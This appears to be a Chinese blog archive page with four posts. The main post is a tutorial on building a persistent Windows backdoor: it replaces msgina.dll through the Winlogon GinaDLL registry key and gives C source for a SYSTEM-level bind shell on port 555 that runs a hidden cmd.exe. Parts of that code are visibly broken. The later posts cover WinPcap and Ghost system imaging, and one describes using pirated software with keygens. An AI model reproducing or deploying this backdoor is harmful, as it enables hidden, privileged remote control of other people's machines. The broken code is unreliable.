分类归档: Network

自己打造GinaBackDoor

前言
“马”玩了不少，不过玩得都是别人写的，总感觉不是很爽。何不自己打造一个属于自己BackDoor呢？！
既然是后门，当然是不能被轻易发现的，这是首要的一条。在WIN2K和XP下进程隐藏可以有DLL加载、远程注入等几种方式。我们今天采用虽然还是属于常见的DLL加载类型。不过这次是替换掉系统的核心DLL，如果强行删除的话……呵呵，下次启动就不正常了。
Socket：毒啊毒！比“独行者”还毒！

前置知识
首先来介绍下Gina在windows中的作用：WinNT、Win2K等在进入用户shell前都有一个身份验证的过程。这个过程就是由Gina完成的，Gina除了验证用户身份以外还要提供图形登陆界面。系统默认的Gina是msgina.dll，在系统目录system32下可以找到。微软除了提供默认的Gina还允许自定义开发Gina以替换掉msgina.dll来实现自己的一些认证方式，这就为我们打造后门提供了条件！
要替换掉系统默认加载的msgina.dll很简单，只要编辑注册表在HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionWinlogon项下加入一个类型为REG_SZ，名为GinaDLL的键值，数据填写我们替换的GinaDLL的名字就OK了。例如：
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"GinaDLL"="ginadll.dll"（ginadll.dll就是我们用来替换的Gina）。

在我们自己的DLL中只要邦定一个SHELL，其他的直接调用msgina.dll就行了。说直接一点就是安装一个中间层，使其达到一个后门的目的。Gina是加载到winlogin进程中的，winlogin是系统的用户交互登陆进程，具有SYSTEM权限，理所当然我们的后门也有SYSTEM权限，这对于后门来说是再好不过了。

实现过程
由于我们一共要替换15个Gina函数，全部写出来会相当大。这里就选几个重要部分做示范，其他的只需直接往下一层的msgina.dll调用就行了，详细请参考完整源代码。
typedef BOOL (WINAPI *PFUNCWLXNEGOTIATE)( DWORD, DWORD* );
typedef BOOL (WINAPI *PFUNCWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );
typedef VOID (WINAPI *PFUNCWLXDISPLAYSASNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
typedef BOOL (WINAPI *PFUNCWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDONSAS)( PVOID, DWORD, PVOID );
typedef VOID (WINAPI *PFUNCWLXDISPLAYLOCKEDNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXWKSTALOCKEDSAS)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXISLOCKOK)( PVOID );
typedef BOOL (WINAPI *PFUNCWLXISLOGOFFOK)( PVOID );
typedef VOID (WINAPI *PFUNCWLXLOGOFF)( PVOID );
typedef VOID (WINAPI *PFUNCWLXSHUTDOWN)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );
typedef BOOL (WINAPI *PFUNCWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );
typedef BOOL (WINAPI *PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);

后门要用到的全局变量
//管道
HANDLE hStdOut = NULL, hSRead = NULL;
HANDLE hStdInput = NULL, hSWrite = NULL;

//用来控制线程是否结束返回
BOOL bExit = FALSE;

//保存创建的CMD进程语柄
HANDLE hProcess = NULL;

//Winlogon进程最先调用的函数，用来检查Gina支持的winlogin版本
BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;

//取得msgina.dll中的WlxNegotiate函数入口
PFUNCWLXNEGOTIATE pWlxNegotiate = (PFUNCWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );
if( !pWlxNegotiate )
return FALSE;

//往下层调用
return pWlxNegotiate( dwWinlogonVersion, pdwDllVersion );
}

//为一个特别的窗口站初始化一个GinaDLL
BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,
PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXINITIALIZE pWlxInitialize = (PFUNCWLXINITIALIZE)GetProcAddress( hDll, "WlxInitialize" );
if( !pWlxInitialize )
return FALSE;

//初始化windows socket的WS2_32.DLL
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;

//同上往下调用
return pWlxInitialize( lpWinsta, hWlx, pvReserved,pWinlogonFunctions,
pWlxContext );
}

//Winlogon在没有用户登陆时接收到一个SAS事件调用这个函数
int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,
PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,
PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXLOGGEDOUTSAS pWlxLoggedOutSAS = (PFUNCWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );
if( !pWlxLoggedOutSAS )
return FALSE;
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);

//后门的主线程开始
CreateThread(NULL,NULL,StartInit,NULL,NULL,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);

//调用下层的WlxLoggedOutSAS
int ret = pWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile );
return ret;
}

//StartInit线程
DWORD WINAPI StartInit(PVOID lp)
{
SOCKET sock=NULL;

//建立一个TCP SOCKET
sock = socket (AF_INET,SOCK_STREAM,IPPROTO_TCP);
SOCKADDR_IN addr_in = {0};
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(555); //端口号，可以自己改
addr_in.sin_addr.S_un.S_addr = htonl(INADDR_ANY);

//绑定到555端口
if(bind(sock,(sockaddr *)&addr_in,sizeof(sockaddr))==SOCKET_ERROR)
return 1;

//侦听
listen(sock,1);
sockaddr_in sin={0};
int size = sizeof(sin);
while ( TRUE )
{
//接受一个连接的请求返回一个SOCKET没有请求则一直阻塞
//在一个连接断开后又返回等待另外的连接
SOCKET recvSock=accept(sock,(sockaddr *)&sin,&size);
if ( recvSock == INVALID_SOCKET ) {
Sleep(1000);
continue;
}
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);
//创建后门
HANDLE hThread = CreateThread(NULL,NULL,BackDoor,&recvSock,0,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);
//等待BackDoor线程结束。
WaitForSingleObject(hThread,INFINITE);
bExit = FALSE;
}
return 1;
}

//BackDoor线程
DWORD WINAPI BackDoor (LPVOID lp)
{

//用来设置管道可被子进程继承
SECURITY_ATTRIBUTES sa;
sa.bInheritHandle =TRUE;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;

//创建管道
CreatePipe ( &hSRead, &hStdOut, &sa, 0 );
CreatePipe ( &hStdInput, &hSWrite, &sa, 0 );
STARTUPINFO StartInfor = {0};
PROCESS_INFORMATION ProInfor = {0};

//重定向子进程的标准输入输出，为我们刚刚建立好的管道
StartInfor.cb = sizeof ( STARTUPINFO );
StartInfor.wShowWindow = SW_HIDE;
StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;
StartInfor.hStdInput = hStdInput;

//取得CMD的完整路径
TCHAR SysDir[MAX_PATH] = {0};
GetSystemDirectory(SysDir,MAX_PATH);
if ( SysDir[strlen(SysDir)-1] != ‘\’)
strcat(SysDir,"\");
strcat(SysDir,"cmd.exe");
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); //创建互斥对象
WaitForSingleObject(hmutex,INFINITE);

//创建CMD子进程
CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor);
hProcess = ProInfor.hProcess;

//由于我们不对CMD的出入输出进行操作所以我们可以关闭
CloseHandle(hStdOut);
CloseHandle(hStdInput);
HANDLE hArray[2] = {0};

//创建一个接收命令线程和一个返回结果的线程
hArray[0] = CreateThread (NULL,NULL,RecvThread,&sock,NULL,NULL);
hArray[1] = CreateThread (NULL,NULL,SendThread,&sock,NULL,NULL);
ReleaseMutex(hmutex);
CloseHandle(hmutex);

//等待2个线程的结束
WaitForMultipleObjects(2,hArray,TRUE,INFINITE);
closesocket(sock);
return 1;
}

//RecvThread 线程
DWORD WINAPI RecvThread ( LPVOID lp)
{
SOCKET sock = *(SOCKET*)lp;
TCHAR CmdBuf[512] = {0}; //接收命令的Buf
int num = 0;
while ( TRUE )
{
if ( bExit == TRUE )
return 1;
TCHAR Tbuf[2] = {0};
int ret = recv(sock, Tbuf, 1, 0); //接收一个字符
if ( ret == 1 )
{
num++; //接收的字符记数
strcat(CmdBuf,Tbuf); //追加到CmdBuf中
send(sock,Tbuf,1,0); //回显
if ( Tbuf[0] == ‘n’ ) //如接收到回车
{
TCHAR buf[5] = {0};
DWORD A=0;
//写到管道中供CMD的标准输入读取
WriteFile(hSWrite,CmdBuf,num,&A,NULL);
memcpy ( buf, CmdBuf, 4);
//如果是exit命令设置线程结束标志
int ret = _stricmp (buf,"exit");
if ( ret == 0 )
bExit = TRUE;
memset(CmdBuf,0,512);
num=0;
}
}
else
{
//如果连接中断终止CMD进程
bExit = TRUE;
DWORD A=0;
GetExitCodeProcess(hProcess,&A);
TerminateProcess(hProcess,A);
}
}
return 1;
}

//SendThread 线程
DWORD WINAPI SendThread ( LPVOID lp )
{
SOCKET sock = *(SOCKET*)lp;
TCHAR Buf[512]={0};
DWORD ReadSize = 0;
while(TRUE)
{
if ( bExit == TRUE ) //如果结束标志为真线程返回
return 1;
//查看管道是否有数据可读
PeekNamedPipe(hSRead,Buf,512,&ReadSize,NULL,NULL);
//有就读取没有就Sleep0.1s再次检查
if ( ReadSize > 0 )
ReadFile(hSRead,Buf,512,&ReadSize,NULL);
else
{
Sleep(100);
continue;
}
//把从管道读出来的数据发给客户端.
send (sock,Buf,ReadSize,0);
memset(Buf,0,512);
}
return 1;

Winpcap简介

译自WinPcap Developer’s pack ，3.0 alpha。ps：traffic generators这个名词怎样译？今天上不了国外网，暂时还查不到资料。

capture series 是今后陆续要写的系列，包括翻译文档，自己的开发经验，以及去年发现并已修改的Jpcap里的一个大bug（伪首部及检验和）。

————————————————————————————-

Winpcap是一个免费公开的软件系统。它用于windows系统下的直接的网络编程。
大多数网络应用程序访问网络是通过广泛使用的套接字。这种方法很容易实现网络数据传输，因为操作系统负责底层的细节（比如协议栈，数据流组装等）以及提供了类似于文件读写的函数接口。

但是有时，简单的方法是不够的。因为一些应用程序需要一个底层环境去直接操纵网络通信。因此需要一个不需要协议栈支持的原始的访问网络的方法。

winpcap适用于下面的开发者：
1.捕获原始数据包。不管这个包是发往本地机，还是其他机器之间的交换包。
2.在数据包被发送到应用程序之前，通过用户定义的规则过滤。
3.向网络发送原始数据包。
4.对网络通信量做出统计。

这些功能依赖于Win32系统内核中的设备驱动以及一些动态链接库。

Winpcap提供了一个强大的编程接口，它很容易地在各个操作系统之间进行移植，也很方便程序员进行开发。

什么样的程序需要使用Winpcap
很多不同的工具软件使用Winpcap于网络分析，故障排除，网络安全监控等方面。Winpcap特别适用于下面这几个经典领域：
1。网络及协议分析
2。网络监控
3。通信日志记录
4。traffic generators
5。用户级别的桥路和路由
6。网络入侵检测系统（NIDS）
7。网络扫描
8。安全工具

Winpcap有些方面不能做。它不依靠主机的诸如TCP/IP协议去收发数据包。这意味着它不能阻塞，不能处理同一台主机中各程序之间的通信数据。它只能“嗅探”到物理线路上的数据报。因此它不适用于traffic shapers，QoS调度，以及个人防火墙。

Winpcap内部结构
Winpcap是一个Win32平台下用于抓包和分析的系统。包括一个内核级别的packet filter，一个底层的DLL(packet.dll)和一个高级的独立于系统的DLL（Wpcap.dll）500){this.resized=true;this.style.width=500;}">

1。捕获系统要能得到网络上原始传输数据必须绕过协议栈。这就需要一个模快运行于操作系统内核，与网络设备驱动接口直接打交道。这一部分极端依赖系统，也被认为是一种设备驱动。现有版本有Windows 85，98，ME，NT 4，2000，Xp。这些驱动提供一些如数据包的捕获与发送这些基本功能，还提供一些高级的可编程的过滤系统和监控引擎。过滤系统可以约束只捕获特定的数据包（比如，只捕获特定主机发送的FTP报文）。监控引擎提供了一种强大但简单的使用机制去获得网络通信的统计荷载数据。
2。捕获系统要让用户程序使用内核提供的功能必须要有一个编程接口。Winpcap提供了两个不同的库：packet.dll 和wpcap.dll。
packet.dll提供一个底层的API，通过这个API可直接访问网络设备驱动，而独立于Microsoft OS.
wpcap.dll是一个高层的强大捕获程序库，与Unix下的libpcap兼容。它独立于下层的网络硬件和操作系统。

走出Windows XP系统最小化克隆误区

在病毒猖獗的互联网时代，小小的Ghost给大家帮了不少忙!–3分钟克隆，3分钟恢复，瞬间系统还原如初!　　然而，人们总是在追求更简便的应用，于是，网络内外到处都有关于Ghost最小化克隆的经验技巧。可令人遗憾的是，对目前Windows XP的最小化克隆，误导性的操作比比皆是，以讹传讹!　　误导之一：删除C盘根目录下的页面文件Hiberfil.sys　　一种做法是教读者一步步打开“控制面板→电源选项→休眠”，取消勾选“启用电源”;另一种做法则更卖力——在DOS 6.22里找到Deltree.exe命令文件，复制到系统盘根目录，然后再通过各种方式将电脑启动到纯DOS，执行Deltree Hiberfil.sys命令以将其删除–因为在Windows下删不掉Hiberfil.sys!　　误导之二：移动虚拟内存或删除Pagefile.sys文件　　也有两种误导方式：一是移动虚拟内存到其他分区;二是同上面一样，启动到纯DOS通过Deltree来删除。　　其实，以上两个文件尽管很大(默认情况下，Hiberfil.sys一般为255MB，Pagefile.sys一般为384MB)，但用Ghost软件进行克隆时，Ghost并没有将它们复制到.gho文件里面去–我曾用Ghost 6.0/7.0/8.0等多个版本反复进行过多次对比克隆，不管是系统盘有没有这两个文件，克隆的最终结果都是433351KB(423MB)左右;同时，用鬼探测者(GhostEXP.exe)打开.gho文件，也都没有Hiberfil.sys和Pagefile.sys的身影!既然如此，何必多此一举!　　那么，使要克隆的系统盘最小化，可取的措施有哪些呢?　　1. 通过Sfc.exe /purgecache清除文件缓存，这是最见效的一招，可将系统减少370MB左右;　　2. 通过对系统盘进行搜索，找出所有的.cab、.zip压缩包，移走或删除(能减少85MB左右);　　3. 通过Cleanmgr(附件里的磁盘清理工具)以及对 .tmp、$ 临时文件的搜索等方式删除临时文件;　　4. 至于帮助文件、字体文件、桌面墙纸文件等，可以移走或删除;　　5. 对于系统自作主张为你安装的组件，比如MSN、OE、附件里的游戏等等，可通过“添加/删除程序”将其卸载;　　6. 很重要的一个习惯：将所有程序都安装在另一个分区，以减少系统分区的大小;　　7. 删除系统盘根目录下的用于系统还原的记载及备份——对于XP系统来说，即便是系统刚装好，也可能在System Volume Information目录中存在几十乃至上百MB的备份文件(单击“工具→文件夹选项→查看”，取消勾选“隐藏受保护的操作系统文件”即可看到)。这一步一般放在最后也就是克隆之前做，这样才能彻底清空，因为只要你的系统还原功能没有关闭，在其监视之下你所做的一切修改都将在C:System Volume Information里备案!当然，删除了它们，在此之前所做的一切修改也就不能还原了!

Windows操作系统万能Ghost全攻略

相信很多朋友都有经常被朋友拉去修机器的经历，重装系统就成了噩梦，于是，万能GHOST诞生了，但是网上很多万能GHOST都没有电源管理的解决办法，也就是说做出来的系统不能软关机。而且网络上发布的万能GHOST大多只是一个空系统罢了，装软件同样费时间啊…………

OK！那我们就来做一个适合自己使用的超级GHOST！

声明：全部使用D版制作

一、准备工作

1、操作系统选择：一般我们选择XP—VLK版作为母版，不需要激活的，更不要破解的。当然这篇文章对2003同样适用。

2、软件准备：找齐你准备在你的超级系统里集成的所有软件（软件必须经过认真测试）、系统修补包（例如SP等）这些东西一定要测试一下。
注意：*在考虑软件的时候要想全一点，各方面要考虑到。
*软件版本必须要新的，这样可以有效延长你的超级镜象的寿命
*要记得集成一个能够有效杀毒并且能升级的杀毒软件（我集成的
是瑞星2005）
*尽量选择公认的、知名的软件，同一用途的软件不要装多了。比如看
图软件选择ACDSEE6.0或者7.0就可以了。其功能已经足够了，不需要
再集成其他类似软件了。

3、制作万能GHOST的机器选择
推荐使用INTEL芯片组的机器，我个人觉得INTEL芯片组的机器做出来的最稳定，VIA的就要差一些，机器不能太老，但也不要使用太新的。I845这样的就比较合适了。尽量使用一线大厂的主板。不要使用在机器上安装过多的其他设备，只需要基本的就可以了。另外，内存要大点，512吧

4、OEM信息准备：编写你自己的OEMINI文件、OEM图片

5、集成常用驱动：去www.mydrivers.com收集大部分常用设备驱动（要那种带INF文件的，分类放好，装在一个文件夹里，文件夹名可以取成“PNP_drv”这样的。）这样做的目的是为了以后在不同的机器上装系统时在没有驱动光盘的情况下让驱动的安装更方便。当然你也可以不做这个（偶就集成了100多兆的驱动）

6、找到关于解决系统电源管理方案的电源管理解决方案压缩包，这里偶给大家推荐一高人制作的小东西，很完美的解决了万能GHOST支持不同主板不同电源管理模式的问题。（不过偶没有上传空间，我也不记得下载地址了，需要的朋友可在上班时间联系QQ：3191775 注明：BBS水友）偶会给你提供这一工具

二、具体实施： ~~~OK！想清楚了？GO！动手的乐趣开始鸟~~~

1、找一块C盘足够大（根据你的具体需要，一般5G）的硬盘，然后安装XP，安装过程就不要我说了吧，注意：安装过程要仔细，力求不出一点点错，安装完成后，尽量使用系统自带驱动，没必要非要装驱动，反正一会都要删掉所有驱动的嘛……（为了让系统适合更多的人，我一般选择磁盘格式为FAT32而不是 NTFS，你可以根据需要选择）

2、安装所需要的补丁，例如SP2等等。
在安装的时候（例如OFFICE2003这样的大家伙还会问你是不是保留安装源文件，应选择否，要不你的系统会过于庞大）。

3、安装软件并将OEM信息文件拷入SYSTEM32目录中，需要注册的软件用注册机先注册，再次提醒：做的时候不要急，慢慢来，做的越仔细你的GHOST越优秀。（注意软件全部安装在C盘，表装在其他分区中哟！）

4、当以上步骤完成后，重启计算机，然后打开事件查看器，看看系统和应用程序里有没有异常的错误。并测试所有软件。
——————————————————————-

5、设置你的系统：*关闭系统还原 *禁止页面交换文件
*禁用休眠支持 *重启动并检查这些项目设置已生效
*清空临时文件夹、缓存文夹，删掉不需要的桌布图片。
这些是为了减少无谓的磁盘空间消耗

6、在C盘建立一个名为sysprep的文件夹，注意：必须是SYSPREP

7、将XP安装光盘上SUPPORTTOOLSDEPLOY.CAB压缩包中的所有文件解压缩到你建立的SYSPREP文件夹中。

8、COPY 你收集的常用驱动程序存放文件夹到C盘根目录。

9、将电源管理解决方案压缩包解压缩到你建立的SYSPREP中。解出来应该包括一个叫ACPI的文件夹和一个ACPI.exe和一个acpi.reg，请不要更改文件夹的正确结构。

10、运行SYSPREP文件夹中从SUPPORTTOOLSDEPLOY.CAB压缩包中解压缩出来的一个名为setupmgr.exe的程序，创建一个自动答应文件（完全自动），以自动提供系统重装时所需要的必要信息。注意：创建出来的自动答应文件名一般为：sysprep.inf 必须存放在C盘中的SYSPREP文件夹中。

10、修改计算机类型为Standard PC，修改完后系统会要求重启，一定不要重启！（必须这样做！）

11、修改IDE ATA/ATAPI控制器中第一个"xxx Controller"为"标准双通道控制器。修改完后系统会要求重启，一定不要重启！（必须这样做！）

12、执行从电源管理解决方案压缩包中解出的一个名为“devcon.exe”的程序（命令为devcon remove * ），以快速删除所有系统中的硬件设备驱动。
使用方法：开始–运行–CMD–在命令行模式下运行（注意命令的路径要正确哦，）

13、运行从电源管理解决方案压缩包中解出的一个名为acpi.reg的注册表文件，将其中信息导入注册表。（目的是为了在第一次启动的时候能够运行电源管理选择程序）以解决电源管理问题。

14、等等，我点支香烟，他母亲的，我的打火机那去了！？

15、运行SYSPREP文件夹中从SUPPORTTOOLSDEPLOY.CAB压缩包中解压缩出来的一个名为sysprep.exe的程序，勾选NOSIDGEN、MINISETUP、已提前激三项（PNP项没必要勾选，会浪费时间的），关机一项最好选择成：SHOUTDOWN
最后，点击重新封装。这时系统将会被重新封装。完成后系统会自动关机（如果在关机一项设置的是“SHUTDOWN”的话）。

16、重新启动系统，用光盘引导系统进DOS，启动GHOST（推荐使用8.0及以上版本）。将C盘打成GHOST镜像。

说明：*由于集成了大量软件所以镜像可能会达到1.5GB左右，因此使用GHOST的时候应使用参数Z9获得最大压缩比的镜像文件。
* 如果需要刻录成光盘的话则需要使用GHOST的分卷刻隆参数，将镜像分卷文件限制为650兆。这样制作出来的镜像文件一般就会有三个。这样一般的镜像不会超过三张盘（不推荐使用700兆的限制，因为有些光驱读起来可能有些困难）。制作光盘的时候头一张应该应该包含以下功能以方便使用：引导+ GHOST.EXE+分卷刻隆的第一部分，后两张光盘应分别刻录后两个分卷。
注意：在使用这三张光盘的时候是有顺序的哟，原因自然不需多讲了。

17、最后随便找个机器测试你的镜像。

18、大功告成！来`来~啵一个~

19、谁能告诉偶偶的打火机在那~~~5555

——————————————————————-

关于镜像的使用：

1、将此镜像恢复到目标计算机。
（应该注意目标计算机的配置，如果是C300A+64MB……那么……一般内存应该至少在128以上，256及以上是比较合适的，毕竟年代不同了嘛）。

2、恢复完镜像后重启。

3、重启后计算机会出现一个安装画面，不要急，这个过程不会有安装的时候那么长的，不过这里会出现个新DD，那就是在这个检测过程中会弹出一个窗口，让你选择电源管理模式，嘿嘿，我们正是需要的这个！上面有很好的提示，自己看吧。提示：这个窗口中有个默认选项ACPI PC，这项适合绝大多数主板的。
注意：*一定要看清楚是支持单处理器还是多处理器的。一般的机器都是单处理器哟。
*如果你选择错误……那么你的机器将不能启动，必须要重新恢复镜像并且重新选择。
*Standard PC适用于任何PC，但是非常可耻的是这种类型不能软关机

4、然后的事情就不需要你管了，自动答应文件会提供所有信息。最后系统会重启。

5、重启后你会看见你熟悉的XP，进入系统后不要操作计算机（耐心等待会），系统会开始重新安装所有的硬件驱动，原因太简单啦~因为你删了所有的硬件驱动嘛………如果此期间系统发现某个设备没有驱动（例如很新的显卡、声卡等），问你要，不要理它，按ESC跳过，让它先把它认识的先装完。
完成后系统会要求重启动。OK，批准~

6、再次重启后，安装其他系统无法直接识别的设备驱动。再次关闭系统还原这个垃圾功能。（页面交换文件系统会自动启用，无需手动设置）。这时候一个带有大部分常用软件的配置精良的系统就已经搞定了。目前的主流机器整个过程仅需不到30分钟。尤其适合我这样经常被拉去帮别人重装系统的人

——————————————————————-

使用方案：

1、由于镜像文件很大，所以偶推荐使用硬盘来装，随便找个硬盘，两个分区，C区一点点大就行，格成启动到DOS的系统区，D盘装GHOST.EXE 和这个硕大无比的镜像外加一些常用的工具。这样需要恢复的时候直接将你的硬盘挂上目标计算机，用你的硬盘引导，启动GHOST，然后开GHO，然后…………
大家都知道，硬盘速度自然比光盘快的多啦~~~

2、光盘方案，没什么好多的，分卷制作镜像文件，分别刻录到三张光盘上，其中第一张要带引导，要有GHOST.EXE。优点是使用方便，不过缺点也很比较明显–速度自然没有硬盘快咯。